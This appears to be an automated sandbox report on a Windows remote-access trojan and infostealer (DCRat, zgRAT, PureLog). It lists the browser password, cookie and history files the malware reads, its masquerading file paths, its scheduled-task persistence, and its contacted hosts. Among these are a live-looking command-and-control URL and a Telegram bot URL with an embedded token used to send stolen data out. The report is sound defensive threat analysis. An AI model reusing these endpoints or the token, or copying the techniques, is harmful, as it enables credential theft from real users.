Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
Source: Yara match	File source: C:\Drivers\fontdrvhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: YGk3y6Tdix.exe, type: SAMPLE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
Source: Yara match	File source: C:\Drivers\fontdrvhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Drivers\fontdrvhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 5012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 6324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: YGk3y6Tdix.exe, type: SAMPLE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
Source: Yara match	File source: C:\Drivers\fontdrvhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: YGk3y6Tdix.exe, type: SAMPLE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
Source: Yara match	File source: C:\Drivers\fontdrvhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	333 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	11 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YGk3y6Tdix.exe	60%	Virustotal		Browse
YGk3y6Tdix.exe	63%	ReversingLabs	Win32.Trojan.DCRat
YGk3y6Tdix.exe	100%	Avira	VBS/Runner.VPG
YGk3y6Tdix.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\CANODYsk.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\MihenAyR.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Drivers\fontdrvhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Internet Explorer\SIGNUP\services.exe	100%	Avira	HEUR/AGEN.1323342
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat	100%	Avira	BAT/Delbat.C
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\BimGJlFQ.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\LRGWtOLy.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\aFStzZSn.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\MihenAyR.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\RKjvWuQm.log	100%	Joe Sandbox ML
C:\Drivers\fontdrvhost.exe	100%	Joe Sandbox ML
C:\Program Files\Internet Explorer\SIGNUP\services.exe	100%	Joe Sandbox ML
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\jWKBqQkB.log	100%	Joe Sandbox ML
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\sRuyTvnC.log	100%	Joe Sandbox ML
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\LRGWtOLy.log	100%	Joe Sandbox ML
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Drivers\fontdrvhost.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Internet Explorer\SIGNUP\services.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BimGJlFQ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CANODYsk.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LRGWtOLy.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\MihenAyR.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RKjvWuQm.log	8%	ReversingLabs
C:\Users\user\Desktop\aFStzZSn.log	8%	ReversingLabs
C:\Users\user\Desktop\bsCLGWVU.log	4%	ReversingLabs
C:\Users\user\Desktop\iIcaGucE.log	25%	ReversingLabs
C:\Users\user\Desktop\jWKBqQkB.log	9%	ReversingLabs
C:\Users\user\Desktop\jqKBOCJa.log	25%	ReversingLabs
C:\Users\user\Desktop\knlJjCXV.log	4%	ReversingLabs
C:\Users\user\Desktop\sRuyTvnC.log	9%	ReversingLabs
C:\Users\user\Desktop\szTqaJAi.log	3%	ReversingLabs
C:\Users\user\Desktop\tWFZTedC.log	3%	ReversingLabs
C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://250345cm.reP	0%	Avira URL Cloud	safe
http://250345cm.renyash.ru/	100%	Avira URL Cloud	malware
http://250345cm.renyash.ru/sqltemp.php	100%	Avira URL Cloud	malware
http://250345cm.renyash.ru	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.59.81	true	false	high
api.telegram.org	149.154.167.220	true	false	high
250345cm.renyash.ru	104.21.38.84	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto	false		high
http://250345cm.renyash.ru/sqltemp.php	true	Avira URL Cloud: malware	unknown
https://ipinfo.io/country	false		high
https://ipinfo.io/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	dhpSrMBRff.26.dr	false		high
http://www.fontbureau.com/designersG	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
http://www.fontbureau.com/designers/?	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.dr	false		high
http://www.fontbureau.com/designers?	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
http://www.fontbureau.com/designers	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.dr	false		high
http://www.goodfont.co.kr	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX	fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://250345cm.reP	fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	doH1J2y0cr.26.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
http://www.galapagosdesign.com/DPlease	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fontdrvhost.exe, 00000004.00000002.1755507962.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://250345cm.renyash.ru	fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
http://ipinfo.io	fontdrvhost.exe, 00000004.00000002.1755507962.0000000003825000.00000004.00000800.00020000.00000000.sdmp	false		high
http://250345cm.renyash.ru/	fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.dr	false		high
https://www.ecosia.org/newtab/	fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	dhpSrMBRff.26.dr	false		high
https://support.mozilla.org/products/firefox	fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.mic	fontdrvhost.exe, 0000001A.00000002.2897795682.000000000084A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io	fontdrvhost.exe, 00000004.00000002.1755507962.000000000380B000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755507962.0000000003849000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	dhpSrMBRff.26.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	doH1J2y0cr.26.dr	false		high
http://api.telegram.org	fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.38.84	250345cm.renyash.ru	United States	13335	CLOUDFLARENETUS	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583014
Start date and time:	2025-01-01 14:51:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YGk3y6Tdix.exe renamed because original name is a hash value
Original Sample Name:	e38b0fc914530e6682d067159b0c7c34.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@40/50@4/3
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, services.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.28.90.27, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 6976 because it is empty
Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 7072 because it is empty
Execution Graph export aborted for target FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PID 7776 because it is empty
Execution Graph export aborted for target fontdrvhost.exe, PID 5012 because it is empty
Execution Graph export aborted for target fontdrvhost.exe, PID 6324 because it is empty
Execution Graph export aborted for target fontdrvhost.exe, PID 6996 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:51:59	API Interceptor	2344015x Sleep call for process: fontdrvhost.exe modified
13:51:59	Task Scheduler	Run new task: FDhouUKjYnvlBIdtOklvQSsmeAjQ path: "C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
13:51:59	Task Scheduler	Run new task: FDhouUKjYnvlBIdtOklvQSsmeAjQF path: "C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
13:51:59	Task Scheduler	Run new task: fontdrvhost path: "C:\Drivers\fontdrvhost.exe"
13:51:59	Task Scheduler	Run new task: fontdrvhostf path: "C:\Drivers\fontdrvhost.exe"
13:51:59	Task Scheduler	Run new task: services path: "C:\Program Files\Internet Explorer\SIGNUP\services.exe"
13:52:00	Task Scheduler	Run new task: servicess path: "C:\Program Files\Internet Explorer\SIGNUP\services.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
